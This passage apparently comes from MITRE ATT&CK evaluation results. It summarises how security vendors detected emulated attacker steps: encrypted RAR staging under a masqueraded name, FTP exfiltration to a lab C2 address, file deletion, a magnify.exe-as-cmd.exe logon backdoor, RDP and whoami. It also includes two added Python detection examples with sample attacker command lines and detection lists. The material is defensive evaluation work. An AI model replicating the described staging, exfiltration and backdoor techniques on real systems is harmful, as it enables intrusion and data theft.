Telemetry showed powershell.exe creating recycler.exe and executing the command-line arguments including the -hp flag, indicating WinRAR utility execution with compression and encryption. The telemetry was tainted by parent "Powershell executed encoded commands" and "Policy Dropper Behavior" alerts. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed the execution of recycler.exe with command-line arguments indicating it was WinRAR and file compression and encryption was used to create an encrypted archive. Telemetry also showed the creation of old.rar as the output of recycler.exe running. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for recycler.exe with RAR command-line arguments, including the -hp flag, for data encryption and compression, indicating it was actually WinRAR masquerading as a different file (tainted by an alert on a PowerShell script with a suspicious command line that was generated by numerous scripts). [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed recycler.exe with full command-line arguments, including the use of the -hp flag to encrypt and compress data, indicating the WinRAR utility was in use. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4]
Enrichment
The capability enriched recycler.exe executing with command-line arguments with a related ATT&CK Technique (Masquerading). [1] [2] [3] [4]
RSA
Telemetry
Telemetry showed execution of recycler.exe with full command-line arguments, including the -hp flag, indicating compression and encryption was used with a WinRAR utility. Vendor stated the file hash is also available and could be used with sources like VirusTotal to identify the binary. YARA is also supported, and rules could be created to identify WinRAR. Vendor stated alert logic exists for many files being accessed in a short period of time, which was not triggered in the evaluation because only one file was accessed. [1] [2]
SentinelOne
Enrichment (Tainted)
Telemetry showed execution of recycler.exe with command-line arguments, including the -hp flag, indicating use of encryption and compression with a WinRAR utility. The Process Name field in the row for recycler.exe enriched the event with "Command line RAR". The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
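The Data Compressed, Data Encrypted and Masquerading entries above all describe the same weak signals: a renamed archiver, a rar "a" command with -hp, execution from an odd directory, a file whose header is a RAR signature, and a write to the root of the Recycle Bin. The following is an added example, not the code of any vendor or of MITRE, that implements those checks over constructed telemetry and correlates them per process; the PE OriginalFilename values, the suspicious-directory list and the severity threshold are assumptions, and the Masquerading ID (T1036) is not on the page.

```python
import re
from dataclasses import dataclass

# RAR 4.x and RAR 5.x signatures used for the header-based archive check.
RAR_MAGICS = (b"Rar!\x1a\x07\x00", b"Rar!\x1a\x07\x01\x00")
# PE OriginalFilename values that identify the WinRAR binaries (assumption).
ARCHIVER_ORIGINAL_NAMES = {"winrar.exe", "rar.exe"}
# A path directly under the Recycle Bin root, i.e. not inside a per-user SID subfolder.
RECYCLE_ROOT = re.compile(r"^[a-z]:\\\$recycle\.bin\\[^\\]+$", re.IGNORECASE)
SUSPICIOUS_DIRS = ("\\$recycle.bin\\", "\\users\\public\\", "\\temp\\")  # assumption
# Signal name -> ATT&CK annotation (T1002/T1022 as on the page; T1036 assumed here).
TECHNIQUES = {
    "Possible Encrypted RAR Archive Command": "T1022 - Data Encrypted",
    "Rar Archive Created": "T1002 - Data Compressed",
    "Renamed Archiver Binary": "T1036 - Masquerading",
}


@dataclass
class ProcessEvent:
    pid: int
    image: str              # full path of the executable
    original_filename: str  # OriginalFilename from PE version info
    command_line: str


@dataclass
class FileWriteEvent:
    pid: int        # writing process
    path: str
    header: bytes   # first bytes of the written file


def process_signals(ev: ProcessEvent) -> list:
    """Weak signals derived from a single process-creation event."""
    hits = []
    basename = ev.image.rsplit("\\", 1)[-1].lower()
    original = ev.original_filename.lower()
    # File metadata says WinRAR, but the on-disk name does not.
    if original in ARCHIVER_ORIGINAL_NAMES and basename != original:
        hits.append("Renamed Archiver Binary")
    tokens = ev.command_line.split()
    # rar "a" (add) command combined with -hp: compress and encrypt data and file names.
    if "a" in tokens[:3] and any(t.startswith("-hp") for t in tokens):
        hits.append("Possible Encrypted RAR Archive Command")
    if any(d in ev.image.lower() for d in SUSPICIOUS_DIRS):
        hits.append("Execution from Suspicious Directory")
    return hits


def file_signals(ev: FileWriteEvent) -> list:
    """Weak signals derived from a single file-write event."""
    hits = []
    if ev.header.startswith(RAR_MAGICS):
        hits.append("Rar Archive Created")
    if RECYCLE_ROOT.match(ev.path):
        hits.append("File Write To Root Of Recycle Bin")
    return hits


def assess(processes, writes) -> dict:
    """Correlate weak signals per pid; three or more together are rated high (assumed threshold)."""
    by_pid = {}
    for p in processes:
        by_pid.setdefault(p.pid, []).extend(process_signals(p))
    for w in writes:
        by_pid.setdefault(w.pid, []).extend(file_signals(w))
    result = {}
    for pid, sigs in by_pid.items():
        if not sigs:
            continue
        result[pid] = {
            "severity": "high" if len(sigs) >= 3 else "weak",
            "signals": sorted(sigs),
            "techniques": sorted({TECHNIQUES[s] for s in sigs if s in TECHNIQUES}),
        }
    return result


# Constructed sample telemetry (not captured from the evaluation).
SAMPLE_PROCESSES = [
    ProcessEvent(4120, r"C:\$Recycle.Bin\recycler.exe", "WinRAR.exe",
                 r'recycler.exe a -hpEXAMPLE C:\$Recycle.Bin\old.rar "C:\Users\bob\Documents\plan.vsdx"'),
    ProcessEvent(5001, r"C:\Program Files\WinRAR\WinRAR.exe", "WinRAR.exe",
                 r'"C:\Program Files\WinRAR\WinRAR.exe" a C:\Users\bob\Desktop\photos.rar C:\Users\bob\Pictures'),
]
SAMPLE_WRITES = [
    FileWriteEvent(4120, r"C:\$Recycle.Bin\old.rar", b"Rar!\x1a\x07\x01\x00" + b"\x00" * 8),
    FileWriteEvent(5001, r"C:\Users\bob\Desktop\photos.rar", b"Rar!\x1a\x07\x00" + b"\x00" * 8),
    FileWriteEvent(7, r"C:\$Recycle.Bin\S-1-5-21-1000\$R1ABC.txt", b"plain text"),
]

if __name__ == "__main__":
    for pid, verdict in assess(SAMPLE_PROCESSES, SAMPLE_WRITES).items():
        print(pid, verdict)
```

The legitimate WinRAR run (pid 5001) still produces the single "Rar Archive Created" signal, which is why the page labels each of these as a weak signal and why correlation across the process and file events is what separates the staging step from ordinary archiving.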
Carbon Black
Enrichment
The capability enriched ftp.exe with the correct ATT&CK Technique (Exfil Over Alternate Protocol). [1] [2]
Telemetry
Telemetry showed a process tree for ftp.exe being executed with command-line arguments including ftp.txt. [1] [2]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because collected files were exfiltrated via FTP. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating ftp.exe executing with ftp.txt was suspicious. The process tree view showed ftp.exe as tainted by a previous powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2]
Telemetry
Telemetry within the OverWatch alert showed ftp.exe executing with ftp.txt. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Cybereason
Telemetry
Telemetry showed the execution of ftp.exe and command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4]
Enrichment (Tainted)
The capability enriched ftp.exe execution with a related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry showed the creation of ftp.txt and ftp.exe executing with command-line arguments. Telemetry also showed the FTP connection to 192.168.0.4 (C2 server) on port 21. [1]
FireEye
Enrichment
The capability enriched ftp.exe execution with an alert for FTP Utility Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Software (T0095 - FTP). [1] [2] [3] [4]
Enrichment
The capability enriched a TCP port 21 connection to 192.168.0.4 (C2 server) with an alert for FTP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1048 - Exfiltration Over Alternative Protocol) and Tactic (Exfiltration). [1] [2] [3] [4]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed the ftp commands being written to ftp.txt and the subsequent execution of ftp.exe with the file. The old.rar file was seen uploaded to 192.168.0.4 (C2 server). Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4]
Enrichment
The capability enriched ftp.exe with the -s argument with a separate alert for FTP Utility Execution (Weak Signal). [1] [2] [3] [4]
F-Secure
Specific Behavior
A Specific Behavior alert was generated for the execution of ftp.exe with a command file option by an unusual parent process, noting that it could be used for exfiltration. [1] [2]
Telemetry
Telemetry showed ftp.exe with ftp.txt as an argument as well as an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing ftp.exe with ftp.txt as an argument as well as an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. The telemetry was tainted by the parent "Powershell executed encoded commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
Enrichment
The capability enriched powershell.exe executing ftp.exe with the correct ATT&CK Tactic (Exfiltration) and Technique (Exfiltration over Alternative Protocol) and a suspicious indicator that a connection was made to a remote server via the FTP protocol. [1] [2]
Telemetry (Tainted)
Telemetry showed powershell.exe executing ftp.exe, which made an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for ftp.exe with command-line arguments including ftp.txt (tainted by an alert on a PowerShell script with a suspicious command line that was generated by numerous scripts). Telemetry also showed connections to 192.168.0.4 (C2 server) on ports 20 and 21 for the FTP connection. [1] [2] [3]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed the execution of ftp.exe and command-line arguments as well as an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3]
Enrichment (Tainted)
The capability enriched ftp.exe as the execution of a CLI file transfer/copy utility. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3]
RSA
Telemetry
Telemetry showed the execution of ftp.exe with command-line arguments, including ftp.txt, for exfiltration. The contents of ftp.txt were not seen. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed ftp.exe running with ftp.txt as an argument. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1]
Carbon Black
Telemetry
Telemetry showed the deletion of old.rar. [1] [2]
CrowdStrike
Telemetry
Telemetry showed the deletion of old.rar with an event name of FileDeleted. [1] [2] [3] [4]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including old.rar) were deleted from the host CodeRed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed a deletion event for old.rar via powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure, though there was telemetry to show the creation of old.rar. A host query for the file showed the old.rar no longer exists, but no deletion event was seen. [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed powershell.exe executing the command to delete old.rar. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe deleting old.rar from the Recycle Bin. The telemetry was tainted by the parent "PowerShell executed encoded commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2]
Microsoft
None
No detection capability demonstrated for this procedure, though data showed execution sequence for the PowerShell "Remove-Item" cmdlet (no arguments were available to indicate what was deleted). [1]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed the file delete event for old.rar. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2]
RSA
None
No detection capability demonstrated for this procedure. The master file table on 10.0.1.5 (CodeRed) was inspected through the capability to look for deleted files, showing old.rar. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed the file deletion of old.rar. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry showed the deletion of recycler.exe. [1] [2]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including recycler.exe) were deleted from the host CodeRed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry
Telemetry showed the deletion of recycler.exe with an event name of ExecutableDeleted. [1] [2] [3] [4]
Cybereason
Telemetry (Tainted)
Telemetry showed a deletion event for recycler.exe via powershell.exe. The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2]
Endgame
Telemetry
Telemetry showed a deletion event for recycler.exe caused by powershell.exe. [1]
FireEye
None
No detection capability demonstrated for this procedure.
F-Secure
Telemetry
Telemetry showed powershell.exe executing the command to delete recycler.exe. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe deleting recycler.exe. The telemetry was tainted by the parent "PowerShell executed encoded commands" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
Enrichment
The capability enriched PowerShell deleting recycler.exe with the correct ATT&CK Tactic (Defense Evasion) and Technique (File Deletion) and a suspicious indicator that an executable file was deleted from the system root folder. [1] [2]
Telemetry (Tainted)
Telemetry showed file deletion event for recycler.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Microsoft
None
No detection capability demonstrated for this procedure. [1]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed the file delete event for recycler.exe. The telemetry was tainted by a parent alert on wscript.exe. The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2]
RSA
None
No detection capability demonstrated for this procedure. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed the file deletion of recycler.exe. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2]
Carbon Black
General Behavior
A General Behavior alert was generated named "Execution of cmd from non-standard path" with a 60/100 severity score. [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated on execution of magnify.exe named "Suspicious screen magnifier process" with a 76/100 severity score. [1] [2] [3] [4]
General Behavior
A General Behavior alert was generated named "Suspicious renamed cmd process" with a 72/100 severity score. [1] [2] [3] [4]
Telemetry
Telemetry within the process tree showed magnify.exe executing from utilman.exe. [1] [2] [3] [4]
CrowdStrike
Telemetry
Telemetry within the alert showed the details for magnify.exe, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated on utilman.exe executing magnify.exe, noting that "a process chain bypassed Windows logon security." The alert was marked critical and was mapped to the correct ATT&CK Technique (Accessibility Features) and Tactic (Persistence). Data in the alert also showed that magnify.exe was identified as cmd.exe based on hash value in the common name field. [1] [2] [3] [4] [5]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating a Windows logon bypass on Creeper was observed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5]
Cybereason
Specific Behavior
A Specific Behavior alert was generated based on a new process masquerading as a Windows accessibility feature, mapped to the correct ATT&CK Tactic (Persistence) and Technique (Accessibility Features). [1] [2] [3]
Telemetry
Telemetry showed the execution of magnify.exe. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3]
Endgame
Telemetry (Tainted)
Telemetry in the event tree showed the execution of magnify.exe by utilman.exe (tainted by the Windows File Name Mismatch alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
Enrichment (Delayed, Tainted)
The capability enriched magnify.exe with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactics (Defense Evasion, Execution) (tainted by the Windows File Name Mismatch alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated on Windows File Name Mismatch between magnify.exe and cmd.exe, indicating this could be used for accessibility features in the description. The alert is tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactics (Defense Evasion, Execution). [1] [2] [3] [4]
FireEye
Specific Behavior
A Specific Behavior alert was generated for Accessibility Features Child Process due to whoami.exe spawning from magnify.exe. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactics (Persistence, Privilege Escalation). [1] [2] [3] [4] [5] [6] [7]
General Behavior
A General Behavior alert was generated for RENAMED CMD.EXE, with a description explaining how attackers will sometimes rename cmd.exe to other filenames to try to bypass detections. [1] [2] [3] [4] [5] [6] [7]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker replaced the magnifier.exe accessibility feature to launch a privileged command shell. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7]
F-Secure
Enrichment
The capability enriched utilman.exe executing magnify.exe with a tag indicating that magnify was a persistent backdoor. [1] [2] [3] [4] [5]
Telemetry
Telemetry showed magnify.exe executing from utilman.exe with the original file name of cmd.exe. [1] [2] [3] [4] [5]
General Behavior
A General Behavior alert was generated for magnify.exe executing as a process with a renamed executable. [1] [2] [3] [4] [5]
GoSecure
Telemetry (Tainted)
Telemetry showed magnify.exe executing from parent process utilman.exe (PID 3996). The telemetry was tainted by the parent POS Interactive Login Event alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Specific Behavior
A Specific Behavior alert was generated for the command prompt tool executing while masquerading as an accessibility tool. The alert was tagged with the correct ATT&CK Tactics (Persistence, Privilege Escalation) and Technique (Accessibility Features). [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed magnify.exe (original name identified as cmd.exe) executing from utilman.exe. The telemetry was tainted by a trace detection on magnify.exe. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed execution of magnify.exe from utilman.exe. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated on a successful sticky keys binary hijack because magnify.exe was executing as cmd.exe. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry
Telemetry showed magnify.exe executing from utilman.exe. [1] [2] [3]
RSA
Telemetry
Telemetry showed execution of magnify.exe. [1] [2] [3]
SentinelOne
Telemetry
Telemetry showed execution of magnify.exe, which was identified as a Windows Command Processor within the interface. The activity was associated with a new story (Group ID). [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry
Telemetry showed a logon type 10 (remote interactive logon) for Kmitnick on Creeper, indicating an RDP session was established and logged into. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Telemetry
Telemetry showed creation of an RDP session on Creeper (10.0.0.4). [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched an RDP connection with information that the connection was made to an RDP port, as well as a related ATT&CK Tactic (Command and Control) and Techniques (Commonly Used Port, Standard Application Layer Protocol). [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry
Telemetry showed a connection to port 3389 on Creeper (10.0.0.4) with information transmitted in bytes, indicating an RDP session was established. [1] [2] [3] [4] [5]
FireEye
Enrichment
The capability enriched a TCP port 3389 connection with an alert for RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the use of the Remote Desktop Protocol to connect to Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Enrichment
The capability enriched a Remote Desktop connection indicating a successful login to Remote Desktop Services. [1] [2] [3]
GoSecure
Telemetry
Telemetry showed an inbound connection to Creeper (10.0.0.4) on port 3389. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
Telemetry
Telemetry showed creation of a terminal services session on Creeper from CodeRed with corresponding logon by Kmitnick. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry
Telemetry showed an inbound connection to Creeper (10.0.0.4) on port 3389. [1] [2] [3] [4] [5]
RSA
None
No detection capability demonstrated for this procedure. [1]
SentinelOne
None
No detection capability demonstrated for this procedure. [1] [2] [3]
Carbon Black
Enrichment
The capability enriched whoami.exe with the correct ATT&CK Technique (T1033 - System Owner/User Discovery). [1] [2] [3] [4] [5]
Telemetry
Telemetry within the process tree showed magnify.exe executing whoami.exe. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry (Tainted)
Telemetry showed execution of whoami.exe. The process tree view showed whoami.exe was tainted by a previous magnify.exe detection. [1] [2] [3] [4] [5] [6]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated based on whoami.exe performing Reconnaissance as a SYSTEM user. The alert was tagged with the correct ATT&CK Tactic (Discovery) and Technique (System Owner/User Discovery). The alert was tainted by a parent Accessibility Features alert. [1] [2] [3] [4]
Telemetry
Telemetry showed the execution of whoami.exe. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched whoami.exe with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery). The enrichment was tainted by an alert on Windows File Name Mismatch-Accessibility Features. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed whoami.exe was executed from magnify.exe. The telemetry was tainted by an alert on Windows File Name Mismatch-Accessibility Features. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
Enrichment
The capability enriched whoami.exe with an alert for Whoami Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed whoami.exe executing from magnify.exe within an alert for Accessibility Features Child Process. The telemetry was tainted by the Accessibility Features Child Process (METHODOLOGY) alert. [1] [2] [3] [4] [5] [6] [7]
F-Secure
Enrichment
The capability enriched whoami.exe with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior
A General Behavior alert was generated showing that a spawned process (whoami) has been tagged for monitoring because its parent process has a detection (magnify.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry
Telemetry showed whoami.exe was executed from magnify.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
Telemetry (Tainted)
Telemetry showed magnify.exe executing whoami.exe. The telemetry was tainted by the parent POS Interactive Login Event alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Specific Behavior
A Specific Behavior alert was generated because the whoami command was executed through a masqueraded tool (magnify.exe). [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed magnify.exe (original name identified as cmd.exe) executing whoami.exe. The telemetry was tainted by a trace detection on magnify.exe. [1] [2] [3] [4] [5] [6] [7]
Microsoft
Telemetry (Tainted)
Telemetry showed whoami.exe executing from magnify.exe (tainted by sticky keys binary hijack alert). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment
The capability enriched whoami.exe executing as an enumeration command. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed magnify.exe executing whoami.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed execution of whoami.exe. [1] [2] [3]
SentinelOne
Enrichment
Enrichment showed execution of the whoami command (enriched with description "whoami - displays logged on user information"). Execution of whoami was associated with the story (Group ID) created from the execution of magnify.exe, but was not considered tainted because an alert was not generated when magnify.exe was executed. [1] [2] [3] [4]
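Several of the Accessibility Features results above rest on one check, a file name mismatch between the on-disk image (magnify.exe) and the PE original file name (cmd.exe), and the whoami.exe results show how a parent alert "taints" child telemetry. The following is an added example, not code from the MITRE evaluation or any vendor, that implements both over constructed Sysmon-style process-creation events; the accessibility binary list, PIDs and paths are assumptions.

```python
# Added example: detect an accessibility binary whose PE OriginalFileName is a
# command shell (the T1015 hijack seen on Creeper) and propagate the resulting
# alert as "taint" to descendant processes such as whoami.exe.

# Windows accessibility binaries launched from the logon screen (assumed list).
ACCESSIBILITY_BINARIES = {"magnify.exe", "sethc.exe", "utilman.exe", "osk.exe",
                          "narrator.exe", "displayswitch.exe", "atbroker.exe"}
# Original file names that should never sit behind an accessibility binary name.
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed process-creation events: (pid, ppid, image path, OriginalFileName).
# PIDs ascend so parents are processed before their children.
EVENTS = [
    (1000, 500, r"C:\Windows\System32\winlogon.exe", "WINLOGON.EXE"),
    (3996, 1000, r"C:\Windows\System32\utilman.exe", "Utilman.exe"),
    (4100, 3996, r"C:\Windows\System32\magnify.exe", "Cmd.Exe"),      # renamed cmd.exe
    (4200, 4100, r"C:\Windows\System32\whoami.exe", "whoami.exe"),    # child of the hijack
    (4300, 1000, r"C:\Windows\System32\magnify.exe", "MAGNIFY.EXE"),  # legitimate magnifier
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return {pid: reason}. A pid gets an 'alert' reason when its image name is an
    accessibility binary but its OriginalFileName is a shell; it gets a 'tainted'
    reason when any ancestor already has a finding (the evaluation's taint rule)."""
    by_pid = {e[0]: e for e in events}
    findings = {}
    for pid, ppid, image, orig in sorted(events):
        name = basename(image)
        parent = basename(by_pid[ppid][2]) if ppid in by_pid else "unknown"
        if name in ACCESSIBILITY_BINARIES and orig.lower() in SHELLS:
            findings[pid] = "alert: %s (OriginalFileName %s) spawned by %s (T1015)" % (
                name, orig.lower(), parent)
        elif ppid in findings:
            findings[pid] = "tainted: %s inherits finding from parent pid %d" % (name, ppid)
    return findings


if __name__ == "__main__":
    for pid, reason in detect(EVENTS).items():
        print(pid, reason)
```

Only the renamed magnify.exe raises an alert; the legitimate magnify.exe (matching OriginalFileName) and utilman.exe produce nothing, and whoami.exe is marked tainted rather than alerted, the distinction the evaluation draws between a detection and tainted telemetry.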